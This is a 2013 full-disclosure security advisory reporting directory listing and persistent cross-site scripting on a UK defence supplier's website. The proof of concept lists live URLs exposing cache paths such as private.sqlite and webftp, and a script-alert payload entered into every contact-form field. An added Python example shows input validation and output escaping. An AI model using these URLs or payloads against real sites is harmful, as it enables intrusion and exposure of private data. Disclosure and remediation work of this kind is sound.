OPTOMISE SYSTEM Ltd (UK Ministry of Defence and emergency services) Full Directory Information Disclosure / Persistent XSS

Time Line Vulnerability
************************
04-11-2013 Security Advisory
07-11-2013 Asked about the issues -> No response
14-11-2013 Asked about the issues -> No response -> Not fixed
18-11-2013 Full Disclosure

I. VULNERABILITY
-------------------------
#Title: OPTOMISE SYSTEM Ltd (UK Ministry of Defence and emergency services) Full Directory Information Disclosure / Persistent XSS
#Vendor: https://www.optomise.com
#Author: Juan Carlos García (@secnight)
#Follow me: http://asap-sec.com Twitter: @secnight

II. DESCRIPTION
-------------------------
Optomise Systems Limited specialise in sourcing and promoting advanced technology, systems and products from UK and international companies, to the UK Ministry of Defence and emergency services.

The experienced team at Optomise has a thorough understanding of the UK Ministry of Defence procurement system, and their operational and capability requirements.

This knowledge, together with a remarkable international personal database of companies, links and a network of International Associates, ensures that the team is well placed to advise, assist, develop and create the right environment for a successful business arrangement.

Whether facilitating the development of a joint venture, partnership, subsidiary or selling a single piece of hardware, Optomise approach every task with the same commitment, to obtain and provide the best result.

Whatever the size or scale of your organisation, the services offered can be totally flexible and tailored to meet your specific needs.

Optomise has a working relationship within all levels of the Ministry of Defence and the team is equally at home talking to decision-makers or end users.

This combination has proven very successful and business has expanded through personal recommendation.

Optomise Systems is a member of the Advancing UK AeroSpace Defence and Security Industries (ADS) and a board member of the National Defense Industrial Association (NDIA), SO/LIC Committee, in the USA.

III. PROOF OF CONCEPT
-------------------------
Full Directory Information Disclosure
**************************************
https://www.optomise.com/cache
https://www.optomise.com/cache/-+index/
https://www.optomise.com/cache/70+direct-sales/
https://www.optomise.com/cache/70,171,172,179+index/
https://www.optomise.com/cache/536_1015x672_0x.bzr.jpeg
https://www.optomise.com/cache/plus+webftp/
https://www.optomise.com/cache/privado+index/
https://www.optomise.com/cache/private.sqlite+index/
https://www.optomise.com/cache/processSimple.do+index/
https://www.optomise.com/cache/public+proxy.php/
https://www.optomise.com/cache/CVS+Root/
etc etc etc

Persistent Cross-Site Scripting
******************************
Go to
--------
https://www.optomise.com/contact-us/
Form
Name
<script>alert("asapsec")</script>
Company
<script>alert("asapsec")</script>
Email Address
<script>alert("asapsec")</script>
Phone Number
<script>alert("asapsec")</script>
Comments
<script>alert("asapsec")</script>
Response:
---------
"Thank you"
"Thank you for your enquiry. Someone will get back to you shortly."

The impact of this vulnerability
**********************************
(...)
How to fix this vulnerability
******************************
Write Secure Code

IV. BUSINESS IMPACT
-------------------------
This type of security flaw is extremely dangerous because it can have a serious impact on customers and states (... military ...).
Disclosure of information about the military components and other things.

V. SOLUTION
------------------------
Write Secure Code
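
Added example, not part of the original advisory and not the vendor's code: one way to handle the five contact-form fields listed in the proof of concept, validating structured fields on input and HTML-escaping every stored value when it is rendered. The function names, length limits, patterns and the table-row rendering are assumptions made for illustration.

```python
import html
import re

# Field names come from the contact form in the advisory; limits and patterns are assumptions.
FIELDS = {
    "name": (100, None),
    "company": (100, None),
    "email": (254, re.compile(r"[^@\s<>\"']+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")),
    "phone": (30, re.compile(r"\+?[0-9 ()./-]{5,30}")),
    "comments": (2000, None),
}


def validate_enquiry(form):
    """Return (clean, errors). Values are stored as submitted, never pre-escaped."""
    clean, errors = {}, {}
    for field, (max_len, pattern) in FIELDS.items():
        value = str(form.get(field, "")).strip()
        if not value or len(value) > max_len:
            errors[field] = "missing or too long"
        elif pattern is not None and not pattern.fullmatch(value):
            errors[field] = "invalid format"
        else:
            clean[field] = value
    return clean, errors


def render_enquiry_unsafe(enquiry):
    """The flawed pattern: stored values concatenated into HTML as-is."""
    return "".join(f"<tr><th>{k}</th><td>{v}</td></tr>" for k, v in enquiry.items())


def render_enquiry(enquiry):
    """Hardened: every stored value is HTML-escaped at output time."""
    return "".join(
        f"<tr><th>{html.escape(k)}</th><td>{html.escape(v, quote=True)}</td></tr>"
        for k, v in enquiry.items()
    )


# Constructed sample submission using the test string from the advisory.
PAYLOAD = '<script>alert("asapsec")</script>'
SAMPLE = {f: PAYLOAD for f in FIELDS}

if __name__ == "__main__":
    clean, errors = validate_enquiry(SAMPLE)
    print("rejected by validation:", sorted(errors))
    print(render_enquiry(clean))
```

Validation alone does not cover the free-text fields (name, company, comments), which is why escaping at output is applied to every value regardless of what validation accepted.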

VI. CREDITS
-------------------------
This vulnerability has been discovered by Juan Carlos García (@secnight)

VII. LEGAL NOTICES
-------------------------
The Author accepts no responsibility for any damage.